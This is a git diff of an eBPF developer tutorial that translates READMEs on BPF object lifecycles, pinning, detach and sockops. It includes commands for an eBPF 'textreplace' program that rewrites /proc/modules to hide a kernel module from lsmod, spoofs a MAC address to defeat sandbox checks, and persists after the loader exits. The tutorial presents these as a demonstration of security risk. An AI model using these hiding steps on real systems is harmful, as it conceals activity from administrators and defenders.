Any Program with eBPF - -See for the full source code. - -Compile: - -```bash -make -``` - -Usage: - -```sh -sudo ./replace --filename /path/to/file --input foo --replace bar -``` - -This program will replace all text in the file that matches 'input' with 'replace' text. -There are many use cases for this, such as: - -Hiding the kernel module 'joydev' to avoid detection by tools like 'lsmod': - -```bash -./replace -f /proc/modules -i 'joydev' -r 'cryptd' -``` - -Spoofing the MAC address of the 'eth0' interface: - -```bash -./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' -``` - -Malware performing anti-sandbox checks may look for MAC addresses as an indication of whether it is running in a virtual machine or sandbox, rather than on a "real" machine. - -**Note:** The lengths of 'input' and 'replace' must be the same to avoid introducing NULL characters in the middle of the text block. To input a newline character at a bash prompt, use `$'\n'`, for example `--replace $'text\n'`. - -## References - -- . \ No newline at end of file diff --git a/src/28-detach/README.md b/src/28-detach/README.md index a3c2157..645f798 100644 --- a/src/28-detach/README.md +++ b/src/28-detach/README.md @@ -1,46 +1,51 @@ -# 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 +# Running eBPF After Application Exits: The Lifecycle of eBPF Programs -eBPF(Extended Berkeley Packet Filter)是 Linux 内核中的一项重大技术创新,允许用户在内核空间中执行自定义程序,而无需修改内核源代码或加载任何内核模块。这为开发人员提供了极大的灵活性,可以观察、修改和控制 Linux 系统。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. -本文将介绍 eBPF 程序的生命周期,以及如何在用户空间应用程序退出后继续运行 eBPF 程序的方法,还将介绍如何使用 "pin" 在不同进程之间共享 eBPF 对象。本文是 eBPF 开发者教程的一部分,更多详细信息可以在 中找到。 +This article introduces the Lifecycle of eBPF Programs, how to run eBPF programs after user-space application exits, and how to use pin to share eBPF objects between processes. This article is part of the eBPF Developer Tutorial, more details can be found in and -通过使用 "detach" 方法来运行 eBPF 程序,用户空间加载程序可以在不停止 eBPF 程序的情况下退出。另外,使用 "pin" 的方法可以在进程之间共享 eBPF 对象,使其保持活动状态。 +By using the detach method to run eBPF programs, the user space loader can exit without stopping the eBPF program. 
Another common use case for pinning is sharing eBPF objects between processes. For example, one could create a Map from Go, pin it, and inspect it using `bpftool map dump pinned /sys/fs/bpf/my_map`. -## eBPF 程序的生命周期 +## The Lifecycle of eBPF Programs -BPF对象(包括程序、映射和调试信息)通过文件描述符(FD)进行访问,并具有引用计数器。每个对象都有一个引用计数器,用于追踪对象被引用的次数。例如,当创建一个映射时,内核会分配一个struct bpf_map对象,并将其引用计数器初始化为1。然后,将映射的文件描述符返回给用户空间进程。如果进程退出或崩溃,文件描述符将被关闭,并且映射的引用计数将减少。当引用计数为零时,内存将被释放。 +File descriptors and reference counters are used to manage BPF objects (progs, maps, and debug info). When a map is created, the kernel initializes its reference counter to 1 and returns a file descriptor to the user space process. If the process exits or crashes, the file descriptor is closed and the reference counter of the map is decremented. After the RCU grace period, the map is freed from memory. -BPF程序使用 maps 有两个阶段。首先,创建 maps 并将其文件描述符存储为BPF_LD_IMM64指令的一部分。当内核验证程序时,它会增加程序使用的 maps 的引用计数,并将程序的引用计数初始化为1。此时,用户空间可以关闭与maps 相关的文件描述符,但 maps 不会被销毁,因为程序仍然在使用它们。当程序文件描述符关闭且引用计数为零时,销毁逻辑将减少 maps 的引用计数。这允许多个不同类型的程序同时使用同一个 maps。 +BPF programs that use BPF maps are loaded in two phases. The maps are created and their file descriptors are stored in the program's 'imm' field. The kernel increments the reference counters of the maps used by the program and initializes the program's reference counter to 1. Even if the user space process closes the file descriptors associated with the maps, the maps will not disappear because the program is still "using" them. When the file descriptor of the program is closed and its reference counter reaches zero, the destruction logic decrements the reference counters of all maps used by the program. This allows the same map to be used by multiple programs at once. -当程序附加到一个挂钩时,程序的引用计数增加。用户空间进程创建 maps 和程序,然后加载程序并将其附加到挂钩上后,就可以退出了。此时,由用户空间创建的 maps 和程序将保持活动状态,因为引用计数>0。这就是BPF对象的生命周期。只要BPF对象的引用计数>0,内核将保持其活动状态。 +When a program is attached to a hook, its reference counter is incremented. The user space process that created the maps and program can then exit, and the maps and program will remain alive as long as their reference counters are greater than zero. This is the lifecycle of a BPF object. -然而,不同的附加点的行为不同。一些附加点(如XDP、tc的clsact和基于cgroup的hooks)是全局的,即使没有进程使用它们,程序也会继续处理数据包。另一些附加点(如kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩)只在持有事件的进程的生命周期内生效。当这些进程崩溃时,内核将分离BPF程序并减少其引用计数。 +Not all attachment points are the same. XDP, tc's clsact, and cgroup-based hooks are global, meaning that programs will stay attached to them as long as the corresponding objects are alive. On the other hand, programs attached to kprobe, uprobe, tracepoint, perf_event, raw_tracepoint, socket filters, and so_reuseport hooks are local to the process. If the process crashes or closes the file descriptors associated with these hooks, the kernel will detach the BPF program and decrement its reference counter. -总结:XDP、tc、lwt和cgroup挂钩是全局的,而kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩是本地于进程的。基于文件描述符的API具有自动清理的优点,因此如果用户空间进程出现问题,内核将自动清理所有对象。在网络方面,基于文件描述符的API可以防止程序无限制地运行。 +The file descriptor based interface provides auto-cleanup, meaning that if anything goes wrong with the user space process, the kernel will automatically clean up all BPF objects. This interface is useful for networking as well. The use of BPFFS (BPF File System) allows a process to pin a BPF program or map, which increments their reference counters and keeps them alive even if they are not attached or used by any program. 
This is useful when an admin wants to examine a map even when the associated program is not running. -另一种保持 BPF 程序和映射活动的方法是 BPFFS,即BPF文件系统。通过将程序或 maps 固定(pin)到BPFFS中的某个位置,可以增加其引用计数,并使其保持活动状态,即使没有附加到任何位置或任何程序使用固定的BPF程序和 maps 。 +Detach and replace are important aspects of the lifetime of a BPF program. The detach hook prevents the execution of a previously attached program from any future events, while the replace feature allows a program to be replaced in cgroup-based hooks. There is a window where the old and new programs can be executing on different CPUs, but the kernel guarantees that one of them will be processing events. Some BPF developers use a scheme where the new program is loaded with the same maps as the old program to ensure safe replacement. -了解BPF程序和 maps 的生命周期对于用户安全、可靠地使用BPF是非常重要的。文件描述符、引用计数器和 BPFFS 等机制有助于管理BPF对象的生命周期,确保它们的正确创建、附加、分离和替换。 +Overall, understanding the lifetime of BPF programs and maps is crucial for users to use BPF safely and without surprises. The use of file descriptors, reference counters, and BPFFS helps manage the lifecycle of BPF objects, ensuring their proper creation, attachment, detachment, and replacement. -### Kubernetes 中的 eBPF:通过远程过程调用(RPC)部署 eBPF 程序 +### eBPF in Kubernetes: Deploy eBPF Programs via Remote Procedure Call -在 Kubernetes 环境中,部署 eBPF 程序通常需要更高级别的系统权限。通常,这些应用程序需要至少 CAP_BPF 权限,根据程序类型的不同,可能还需要其他权限。在多租户的 Kubernetes 环境中,为每个容器或应用程序授予广泛的权限可能带来安全风险。 +In a Kubernetes environment, deploying eBPF programs often necessitates a higher level of system privileges. Typically, these applications require at least CAP_BPF permissions, and depending on the program type, they may need even more. This requirement poses a challenge in a multi-tenant Kubernetes environment where granting extensive privileges can be a security risk. -为了解决权限问题,一种方法是通过固定(pinning)eBPF 映射来减轻权限要求。固定允许 eBPF 对象在创建它们的进程的生命周期之外保持活动状态,以便其他进程可以访问它们。在 Kubernetes 中,不同的容器可能需要与相同的 eBPF 对象进行交互,因此固定对象很有用。 +#### Using Pin to Mitigate Privilege Requirements -例如,可以使用特权的初始化器容器来创建并固定一个 eBPF 映射。随后的容器(可能以较低权限运行)可以与固定的 eBPF 对象进行交互。这种方法将权限要求限制在初始化阶段,增强了整体安全性。 +One way to address the privilege issue is through the use of pinning eBPF maps. Pinning allows eBPF objects to persist beyond the life of the process that created them, making them accessible to other processes. This method can be particularly useful in Kubernetes, where different containers might need to interact with the same eBPF objects. -在这种背景下,bpfman 项目发挥了关键作用。bpfman,即 BPF Daemon,旨在以更受控且更安全的方式管理 eBPF 程序和映射的生命周期。它充当用户空间与内核空间之间的中间层,提供加载和管理 eBPF 程序的机制,而无需为每个单独的容器或应用程序授予广泛的权限。 +For example, an eBPF map can be created and pinned by a privileged initializer container. Subsequent containers, which may run with fewer privileges, can then interact with the pinned eBPF objects. This approach limits the need for elevated privileges to the initialization phase, thereby enhancing overall security. -在 Kubernetes 中,bpfman 可以作为特权服务部署,负责在集群的不同节点上加载和管理 eBPF 程序。它可以处理 eBPF 生命周期管理的复杂性,如加载、卸载、更新 eBPF 程序,并对其状态进行管理。这种集中化的方法简化了在 Kubernetes 集群中部署和管理 eBPF 程序的过程,同时符合安全最佳实践。 +#### The Role of bpfman in eBPF Lifecycle Management -## 使用 Detach 在应用程序退出后通过任何程序替换 eBPF +The bpfman project can play a crucial role in this context. bpfman, or BPF Daemon, is designed to manage the lifecycle of eBPF programs and maps in a more controlled and secure manner. It acts as a mediator between user space and kernel space, providing a mechanism to load and manage eBPF programs without granting extensive privileges to each individual container or application. 
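Before moving on, the initializer-container pattern described above can be made concrete. Below is a hedged sketch of the consumer side: a lower-privileged process opening a map that a privileged container has already pinned. The pin path `/sys/fs/bpf/shared_map` and the key/value layout are assumptions for illustration only.

```c
/* Minimal sketch: read a map pinned by another (privileged) process. */
#include <stdio.h>
#include <bpf/bpf.h>

int main(void)
{
    /* Assumed pin path: wherever the privileged init container pinned the map. */
    int map_fd = bpf_obj_get("/sys/fs/bpf/shared_map");
    if (map_fd < 0) {
        perror("bpf_obj_get");
        return 1;
    }

    __u32 key = 0;
    __u64 value = 0;
    /* Whether this succeeds without extra capabilities depends on kernel
     * settings and on the permissions of the pinned file in bpffs. */
    if (bpf_map_lookup_elem(map_fd, &key, &value) == 0)
        printf("key %u -> value %llu\n", key, (unsigned long long)value);
    return 0;
}
```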
-在 libbpf 中,可以使用 `bpf_object__pin_maps` 函数将映射固定到 BPF 对象中。对于程序和链接,也有类似的 API。 +In Kubernetes, bpfman could be deployed as a privileged service, responsible for loading and managing eBPF programs across different nodes in the cluster. It can handle the intricacies of eBPF lifecycle management, such as loading, unloading, updating eBPF programs, and managing their state. This centralized approach simplifies the deployment and management of eBPF programs in a Kubernetes cluster, while adhering to security best practices. -以下是一个示例,演示如何使用类似于前一节中的 textreplace 程序的字符串替换示例来展示 detach 方法。可以使用类似的代码将程序、映射和链接固定到 BPF 对象中: +## Use Detach to Replace by Any Program with eBPF After it Exits + +In libbpf, the `bpf_object__pin_maps` function can be used to pin the maps in the BPF object, the programs and links has similar API. + +Here we use similar programs as textreplace in the previous section to demonstrate the detach method, the pin eBPF code is like: ```c + int pin_program(struct bpf_program *prog, const char* path) { int err; @@ -75,43 +80,51 @@ int pin_link(struct bpf_link *link, const char* path) } ``` -## 运行示例 +## Running -在这个示例中,我们将继续使用前一节中的字符串替换示例来演示在应用程序退出后运行 eBPF 程序的方法,并展示潜在的安全风险。通过使用 `--detach` 参数运行该程序,可以使用户空间加载程序在不停止 eBPF 程序的情况下退出。完整的示例代码可以在 中找到。关于如何安装依赖,请参考: +Here, we still use the example of string replacement used in the previous application to demonstrate potential security risks. By using `--detach` to run the program, the user space loader can exit without stopping the eBPF program. -在运行之前,请确保已经挂载了 BPF 文件系统: +The code of This example can be found in + +Compilation: + +```bash +make +``` + +Before running, please make sure that the BPF file system has been mounted: ```bash sudo mount bpffs -t bpf /sys/fs/bpf mkdir /sys/fs/bpf/textreplace ``` -然后,可以使用以下命令运行带有 detach 参数的 text-replace2 程序: +Then, you can run text-replace2 with detach: ```bash ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d ``` -这将在 `/sys/fs/bpf/textreplace` 目录下创建一些 eBPF 链接文件。加载程序成功运行后,可以使用以下命令检查日志: +This will create some eBPF link files under `/sys/fs/bpf/textreplace`. Once the loader is successfully running, you can check the log by running the following command: ```bash sudo cat /sys/kernel/debug/tracing/trace_pipe -# 确认链接文件是否存在 +# Confirm that the link files exist sudo ls -l /sys/fs/bpf/textreplace ``` -最后,要停止程序,只需删除链接文件: +Finally, to stop, simply delete the link files: ```bash sudo rm -r /sys/fs/bpf/textreplace ``` -## 参考资料 +## References -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. 
-- [bad-bpf](https://github.com/pathtofile/bad-bpf) -- [Object Lifetime in the Linux kernel](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html) -- [BPFMan: A Novel Way to Manage eBPF—Beyond Capsule Mode](https://bpfman.io/main/blog/2023/09/07/bpfman-a-novel-way-to-manage-ebpf) +- +- +- -> 原文地址: +> The original link of this article: diff --git a/src/28-detach/README.zh.md b/src/28-detach/README.zh.md new file mode 100644 index 0000000..a3c2157 --- /dev/null +++ b/src/28-detach/README.zh.md @@ -0,0 +1,117 @@ +# 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 + +eBPF(Extended Berkeley Packet Filter)是 Linux 内核中的一项重大技术创新,允许用户在内核空间中执行自定义程序,而无需修改内核源代码或加载任何内核模块。这为开发人员提供了极大的灵活性,可以观察、修改和控制 Linux 系统。 + +本文将介绍 eBPF 程序的生命周期,以及如何在用户空间应用程序退出后继续运行 eBPF 程序的方法,还将介绍如何使用 "pin" 在不同进程之间共享 eBPF 对象。本文是 eBPF 开发者教程的一部分,更多详细信息可以在 中找到。 + +通过使用 "detach" 方法来运行 eBPF 程序,用户空间加载程序可以在不停止 eBPF 程序的情况下退出。另外,使用 "pin" 的方法可以在进程之间共享 eBPF 对象,使其保持活动状态。 + +## eBPF 程序的生命周期 + +BPF对象(包括程序、映射和调试信息)通过文件描述符(FD)进行访问,并具有引用计数器。每个对象都有一个引用计数器,用于追踪对象被引用的次数。例如,当创建一个映射时,内核会分配一个struct bpf_map对象,并将其引用计数器初始化为1。然后,将映射的文件描述符返回给用户空间进程。如果进程退出或崩溃,文件描述符将被关闭,并且映射的引用计数将减少。当引用计数为零时,内存将被释放。 + +BPF程序使用 maps 有两个阶段。首先,创建 maps 并将其文件描述符存储为BPF_LD_IMM64指令的一部分。当内核验证程序时,它会增加程序使用的 maps 的引用计数,并将程序的引用计数初始化为1。此时,用户空间可以关闭与maps 相关的文件描述符,但 maps 不会被销毁,因为程序仍然在使用它们。当程序文件描述符关闭且引用计数为零时,销毁逻辑将减少 maps 的引用计数。这允许多个不同类型的程序同时使用同一个 maps。 + +当程序附加到一个挂钩时,程序的引用计数增加。用户空间进程创建 maps 和程序,然后加载程序并将其附加到挂钩上后,就可以退出了。此时,由用户空间创建的 maps 和程序将保持活动状态,因为引用计数>0。这就是BPF对象的生命周期。只要BPF对象的引用计数>0,内核将保持其活动状态。 + +然而,不同的附加点的行为不同。一些附加点(如XDP、tc的clsact和基于cgroup的hooks)是全局的,即使没有进程使用它们,程序也会继续处理数据包。另一些附加点(如kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩)只在持有事件的进程的生命周期内生效。当这些进程崩溃时,内核将分离BPF程序并减少其引用计数。 + +总结:XDP、tc、lwt和cgroup挂钩是全局的,而kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩是本地于进程的。基于文件描述符的API具有自动清理的优点,因此如果用户空间进程出现问题,内核将自动清理所有对象。在网络方面,基于文件描述符的API可以防止程序无限制地运行。 + +另一种保持 BPF 程序和映射活动的方法是 BPFFS,即BPF文件系统。通过将程序或 maps 固定(pin)到BPFFS中的某个位置,可以增加其引用计数,并使其保持活动状态,即使没有附加到任何位置或任何程序使用固定的BPF程序和 maps 。 + +了解BPF程序和 maps 的生命周期对于用户安全、可靠地使用BPF是非常重要的。文件描述符、引用计数器和 BPFFS 等机制有助于管理BPF对象的生命周期,确保它们的正确创建、附加、分离和替换。 + +### Kubernetes 中的 eBPF:通过远程过程调用(RPC)部署 eBPF 程序 + +在 Kubernetes 环境中,部署 eBPF 程序通常需要更高级别的系统权限。通常,这些应用程序需要至少 CAP_BPF 权限,根据程序类型的不同,可能还需要其他权限。在多租户的 Kubernetes 环境中,为每个容器或应用程序授予广泛的权限可能带来安全风险。 + +为了解决权限问题,一种方法是通过固定(pinning)eBPF 映射来减轻权限要求。固定允许 eBPF 对象在创建它们的进程的生命周期之外保持活动状态,以便其他进程可以访问它们。在 Kubernetes 中,不同的容器可能需要与相同的 eBPF 对象进行交互,因此固定对象很有用。 + +例如,可以使用特权的初始化器容器来创建并固定一个 eBPF 映射。随后的容器(可能以较低权限运行)可以与固定的 eBPF 对象进行交互。这种方法将权限要求限制在初始化阶段,增强了整体安全性。 + +在这种背景下,bpfman 项目发挥了关键作用。bpfman,即 BPF Daemon,旨在以更受控且更安全的方式管理 eBPF 程序和映射的生命周期。它充当用户空间与内核空间之间的中间层,提供加载和管理 eBPF 程序的机制,而无需为每个单独的容器或应用程序授予广泛的权限。 + +在 Kubernetes 中,bpfman 可以作为特权服务部署,负责在集群的不同节点上加载和管理 eBPF 程序。它可以处理 eBPF 生命周期管理的复杂性,如加载、卸载、更新 eBPF 程序,并对其状态进行管理。这种集中化的方法简化了在 Kubernetes 集群中部署和管理 eBPF 程序的过程,同时符合安全最佳实践。 + +## 使用 Detach 在应用程序退出后通过任何程序替换 eBPF + +在 libbpf 中,可以使用 `bpf_object__pin_maps` 函数将映射固定到 BPF 对象中。对于程序和链接,也有类似的 API。 + +以下是一个示例,演示如何使用类似于前一节中的 textreplace 程序的字符串替换示例来展示 detach 方法。可以使用类似的代码将程序、映射和链接固定到 BPF 对象中: + +```c +int pin_program(struct bpf_program *prog, const char* path) +{ + int err; + err = bpf_program__pin(prog, path); + if (err) { + fprintf(stdout, "could not pin prog %s: %d\n", path, err); + return err; + } + return err; +} + +int pin_map(struct bpf_map *map, const char* path) +{ + int err; + err = bpf_map__pin(map, path); + if (err) { + fprintf(stdout, "could not pin map %s: %d\n", path, err); + return err; + } + return err; +} + +int 
pin_link(struct bpf_link *link, const char* path) +{ + int err; + err = bpf_link__pin(link, path); + if (err) { + fprintf(stdout, "could not pin link %s: %d\n", path, err); + return err; + } + return err; +} +``` + +## 运行示例 + +在这个示例中,我们将继续使用前一节中的字符串替换示例来演示在应用程序退出后运行 eBPF 程序的方法,并展示潜在的安全风险。通过使用 `--detach` 参数运行该程序,可以使用户空间加载程序在不停止 eBPF 程序的情况下退出。完整的示例代码可以在 中找到。关于如何安装依赖,请参考: + +在运行之前,请确保已经挂载了 BPF 文件系统: + +```bash +sudo mount bpffs -t bpf /sys/fs/bpf +mkdir /sys/fs/bpf/textreplace +``` + +然后,可以使用以下命令运行带有 detach 参数的 text-replace2 程序: + +```bash +./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d +``` + +这将在 `/sys/fs/bpf/textreplace` 目录下创建一些 eBPF 链接文件。加载程序成功运行后,可以使用以下命令检查日志: + +```bash +sudo cat /sys/kernel/debug/tracing/trace_pipe +# 确认链接文件是否存在 +sudo ls -l /sys/fs/bpf/textreplace +``` + +最后,要停止程序,只需删除链接文件: + +```bash +sudo rm -r /sys/fs/bpf/textreplace +``` + +## 参考资料 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +- [bad-bpf](https://github.com/pathtofile/bad-bpf) +- [Object Lifetime in the Linux kernel](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html) +- [BPFMan: A Novel Way to Manage eBPF—Beyond Capsule Mode](https://bpfman.io/main/blog/2023/09/07/bpfman-a-novel-way-to-manage-ebpf) + +> 原文地址: diff --git a/src/28-detach/README_en.md b/src/28-detach/README_en.md deleted file mode 100644 index 645f798..0000000 --- a/src/28-detach/README_en.md +++ /dev/null @@ -1,130 +0,0 @@ -# Running eBPF After Application Exits: The Lifecycle of eBPF Programs - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. - -This article introduces the Lifecycle of eBPF Programs, how to run eBPF programs after user-space application exits, and how to use pin to share eBPF objects between processes. This article is part of the eBPF Developer Tutorial, more details can be found in and - -By using the detach method to run eBPF programs, the user space loader can exit without stopping the eBPF program. Another common use case for pinning is sharing eBPF objects between processes. For example, one could create a Map from Go, pin it, and inspect it using `bpftool map dump pinned /sys/fs/bpf/my_map`. - -## The Lifecycle of eBPF Programs - -File descriptors and reference counters are used to manage BPF objects (progs, maps, and debug info). When a map is created, the kernel initializes its reference counter to 1 and returns a file descriptor to the user space process. If the process exits or crashes, the file descriptor is closed and the reference counter of the map is decremented. After the RCU grace period, the map is freed from memory. - -BPF programs that use BPF maps are loaded in two phases. The maps are created and their file descriptors are stored in the program's 'imm' field. The kernel increments the reference counters of the maps used by the program and initializes the program's reference counter to 1. Even if the user space process closes the file descriptors associated with the maps, the maps will not disappear because the program is still "using" them. When the file descriptor of the program is closed and its reference counter reaches zero, the destruction logic decrements the reference counters of all maps used by the program. This allows the same map to be used by multiple programs at once. 
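These reference-count rules can be observed from the shell with bpftool; the object file and pin names below are hypothetical, but the pattern is general:

```bash
# Load a program object and pin it: the pin holds a reference,
# so the program survives even though bpftool exits immediately.
sudo bpftool prog load demo.bpf.o /sys/fs/bpf/demo_prog

# Still loaded, with no user-space process around:
sudo bpftool prog show pinned /sys/fs/bpf/demo_prog

# Its maps are alive too, because the loaded program references them:
sudo bpftool map show

# Removing the pin drops the last reference; the kernel then frees
# the program and, in turn, any maps only it was using.
sudo rm /sys/fs/bpf/demo_prog
```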
- -When a program is attached to a hook, its reference counter is incremented. The user space process that created the maps and program can then exit, and the maps and program will remain alive as long as their reference counters are greater than zero. This is the lifecycle of a BPF object. - -Not all attachment points are the same. XDP, tc's clsact, and cgroup-based hooks are global, meaning that programs will stay attached to them as long as the corresponding objects are alive. On the other hand, programs attached to kprobe, uprobe, tracepoint, perf_event, raw_tracepoint, socket filters, and so_reuseport hooks are local to the process. If the process crashes or closes the file descriptors associated with these hooks, the kernel will detach the BPF program and decrement its reference counter. - -The file descriptor based interface provides auto-cleanup, meaning that if anything goes wrong with the user space process, the kernel will automatically clean up all BPF objects. This interface is useful for networking as well. The use of BPFFS (BPF File System) allows a process to pin a BPF program or map, which increments their reference counters and keeps them alive even if they are not attached or used by any program. This is useful when an admin wants to examine a map even when the associated program is not running. - -Detach and replace are important aspects of the lifetime of a BPF program. The detach hook prevents the execution of a previously attached program from any future events, while the replace feature allows a program to be replaced in cgroup-based hooks. There is a window where the old and new programs can be executing on different CPUs, but the kernel guarantees that one of them will be processing events. Some BPF developers use a scheme where the new program is loaded with the same maps as the old program to ensure safe replacement. - -Overall, understanding the lifetime of BPF programs and maps is crucial for users to use BPF safely and without surprises. The use of file descriptors, reference counters, and BPFFS helps manage the lifecycle of BPF objects, ensuring their proper creation, attachment, detachment, and replacement. - -### eBPF in Kubernetes: Deploy eBPF Programs via Remote Procedure Call - -In a Kubernetes environment, deploying eBPF programs often necessitates a higher level of system privileges. Typically, these applications require at least CAP_BPF permissions, and depending on the program type, they may need even more. This requirement poses a challenge in a multi-tenant Kubernetes environment where granting extensive privileges can be a security risk. - -#### Using Pin to Mitigate Privilege Requirements - -One way to address the privilege issue is through the use of pinning eBPF maps. Pinning allows eBPF objects to persist beyond the life of the process that created them, making them accessible to other processes. This method can be particularly useful in Kubernetes, where different containers might need to interact with the same eBPF objects. - -For example, an eBPF map can be created and pinned by a privileged initializer container. Subsequent containers, which may run with fewer privileges, can then interact with the pinned eBPF objects. This approach limits the need for elevated privileges to the initialization phase, thereby enhancing overall security. - -#### The Role of bpfman in eBPF Lifecycle Management - -The bpfman project can play a crucial role in this context. 
bpfman, or BPF Daemon, is designed to manage the lifecycle of eBPF programs and maps in a more controlled and secure manner. It acts as a mediator between user space and kernel space, providing a mechanism to load and manage eBPF programs without granting extensive privileges to each individual container or application. - -In Kubernetes, bpfman could be deployed as a privileged service, responsible for loading and managing eBPF programs across different nodes in the cluster. It can handle the intricacies of eBPF lifecycle management, such as loading, unloading, updating eBPF programs, and managing their state. This centralized approach simplifies the deployment and management of eBPF programs in a Kubernetes cluster, while adhering to security best practices. - -## Use Detach to Replace by Any Program with eBPF After it Exits - -In libbpf, the `bpf_object__pin_maps` function can be used to pin the maps in the BPF object, the programs and links has similar API. - -Here we use similar programs as textreplace in the previous section to demonstrate the detach method, the pin eBPF code is like: - -```c - -int pin_program(struct bpf_program *prog, const char* path) -{ - int err; - err = bpf_program__pin(prog, path); - if (err) { - fprintf(stdout, "could not pin prog %s: %d\n", path, err); - return err; - } - return err; -} - -int pin_map(struct bpf_map *map, const char* path) -{ - int err; - err = bpf_map__pin(map, path); - if (err) { - fprintf(stdout, "could not pin map %s: %d\n", path, err); - return err; - } - return err; -} - -int pin_link(struct bpf_link *link, const char* path) -{ - int err; - err = bpf_link__pin(link, path); - if (err) { - fprintf(stdout, "could not pin link %s: %d\n", path, err); - return err; - } - return err; -} -``` - -## Running - -Here, we still use the example of string replacement used in the previous application to demonstrate potential security risks. By using `--detach` to run the program, the user space loader can exit without stopping the eBPF program. - -The code of This example can be found in - -Compilation: - -```bash -make -``` - -Before running, please make sure that the BPF file system has been mounted: - -```bash -sudo mount bpffs -t bpf /sys/fs/bpf -mkdir /sys/fs/bpf/textreplace -``` - -Then, you can run text-replace2 with detach: - -```bash -./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d -``` - -This will create some eBPF link files under `/sys/fs/bpf/textreplace`. Once the loader is successfully running, you can check the log by running the following command: - -```bash -sudo cat /sys/kernel/debug/tracing/trace_pipe -# Confirm that the link files exist -sudo ls -l /sys/fs/bpf/textreplace -``` - -Finally, to stop, simply delete the link files: - -```bash -sudo rm -r /sys/fs/bpf/textreplace -``` - -## References - -You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. 
- -- -- -- - -> The original link of this article: diff --git a/src/29-sockops/README.md b/src/29-sockops/README.md index c320e85..8548b9f 100644 --- a/src/29-sockops/README.md +++ b/src/29-sockops/README.md @@ -1,26 +1,26 @@ -# eBPF 开发实践:使用 sockops 加速网络请求转发 +# eBPF Development Practices: Accelerating Network Request Forwarding with Sockops -eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows running, loading, and updating user-defined code without the need to modify the kernel source code or reboot the kernel. This capability makes eBPF widely used in various areas such as network and system performance analysis, packet filtering, security policies, etc. -本教程将关注 eBPF 在网络领域的应用,特别是如何使用 sockops 类型的 eBPF 程序来加速本地网络请求的转发。这种应用通常在使用软件负载均衡器进行请求转发的场景中很有价值,比如使用 Nginx 或 HAProxy 之类的工具。 +This tutorial will focus on the application of eBPF in the networking domain, specifically how to use sockops-type eBPF programs to accelerate the forwarding of local network requests. This application is often valuable in scenarios where software load balancers are used for request forwarding, such as using tools like Nginx or HAProxy. -在许多工作负载中,如微服务架构下的服务间通信,通过本机进行的网络请求的性能开销可能会对整个应用的性能产生显著影响。由于这些请求必须经过本机的网络栈,其处理性能可能会成为瓶颈,尤其是在高并发的场景下。为了解决这个问题,sockops 类型的 eBPF 程序可以用于加速本地的请求转发。sockops 程序可以在内核空间管理套接字,实现在本机上的套接字之间直接转发数据包,从而降低了在 TCP/IP 栈中进行数据包转发所需的 CPU 时间。 +In many workloads, such as inter-service communication in a microservices architecture, the performance overhead of network requests made through the loopback interface can significantly impact the overall application performance. Since these requests have to go through the local network stack, their processing performance can become a bottleneck, especially in high-concurrency scenarios. To address this issue, sockops-type eBPF programs can be used to accelerate local request forwarding, providing functionality similar to direct memory access (DMA). Sockops programs can manage sockets in the kernel space and directly forward packets between sockets on the local machine, reducing the CPU time required for packet forwarding in the TCP/IP stack. -本教程将会通过一个具体的示例演示如何使用 sockops 类型的 eBPF 程序来加速网络请求的转发。为了让你更好地理解如何使用 sockops 程序,我们将逐步介绍示例程序的代码,并讨论每个部分的工作原理。完整的源代码和工程可以在 中找到。 +This tutorial will demonstrate how to use sockops-type eBPF programs to accelerate network request forwarding through a specific example. To help you understand how to use sockops programs, we will step by step introduce the code of the example program and discuss the working principle of each part. The complete source code and project can be found at . -## 利用 eBPF 的 sockops 进行性能优化 +## Leveraging eBPF Sockops for Performance Optimization -网络连接本质上是 socket 之间的通讯,eBPF 提供了一个 [bpf_msg_redirect_hash](https://man7.org/linux/man-pages/man7/bpf-helpers.7.html) 函数,用来将应用发出的包直接转发到对端的 socket,可以极大地加速包在内核中的处理流程。 +Network connections are essentially communication between sockets, and eBPF provides a `bpf_msg_redirect_hash` function that allows packets sent by an application to be directly forwarded to the corresponding socket on the recipient side, greatly accelerating the packet processing flow in the kernel. 
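For reference, the helper's signature as documented in bpf-helpers(7) looks roughly like this (in `sk_msg` programs the context argument is the `struct sk_msg_md` the program receives):

```c
/* Redirect the message to the socket stored in `map` under `key`.
 * Returns SK_PASS on success or SK_DROP on error. */
long bpf_msg_redirect_hash(struct sk_msg_md *msg, struct bpf_map *map,
                           void *key, __u64 flags);
```

The only supported flag is `BPF_F_INGRESS`, which delivers the message to the ingress path of the looked-up socket rather than its egress path; the example program below uses exactly this flag.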
